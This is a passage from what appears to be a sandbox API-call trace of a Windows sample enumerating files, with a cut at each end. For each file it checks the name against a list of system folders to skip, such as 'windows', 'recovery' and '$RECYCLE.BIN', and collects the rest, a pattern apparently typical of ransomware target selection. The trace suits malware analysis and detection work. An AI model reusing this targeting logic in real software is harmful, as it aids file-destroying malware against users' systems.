nFileSizeLow=0x4bab0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.765] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.765] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.765] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.765] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.765] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.765] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.765] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.765] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.765] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.765] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0126.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0126.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0126.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0126.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0126.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0126.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.766] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0da6398, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0da6398, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0dcc568, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x47ae0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.766] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.766] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.766] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.766] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d800, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dba8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0126.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.766] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ac3289, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ac3289, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8088, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.766] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.766] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.766] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.766] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0126.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0126.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0126.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0126.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0126.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.767] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12ac0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.767] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dba8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e570 [0126.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0126.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.768] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffdb5707, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffdb5707, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffddb96c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19ae0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0126.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dba8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0126.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d920, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0126.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0126.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.768] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4a98712, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4a98712, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4abe91a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x71070, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.768] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0126.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0126.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0126.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0126.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.769] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x67f4711, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67f4711, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6840bbc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14ac8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.769] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0126.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.770] RtlAllocateHeap (HeapHandle=0x1e0000, 